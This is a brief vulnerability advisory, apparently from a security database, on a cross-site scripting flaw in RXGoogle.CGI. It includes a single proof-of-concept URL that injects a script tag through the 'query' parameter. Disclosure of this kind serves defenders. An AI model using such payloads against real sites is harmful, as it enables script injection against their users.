• info
• discussion
• exploit
• solution
• references

RXGoogle.CGI Cross Site Scripting Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

http://www.example.com/cgi-bin/rxgoogle.cgi?query=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E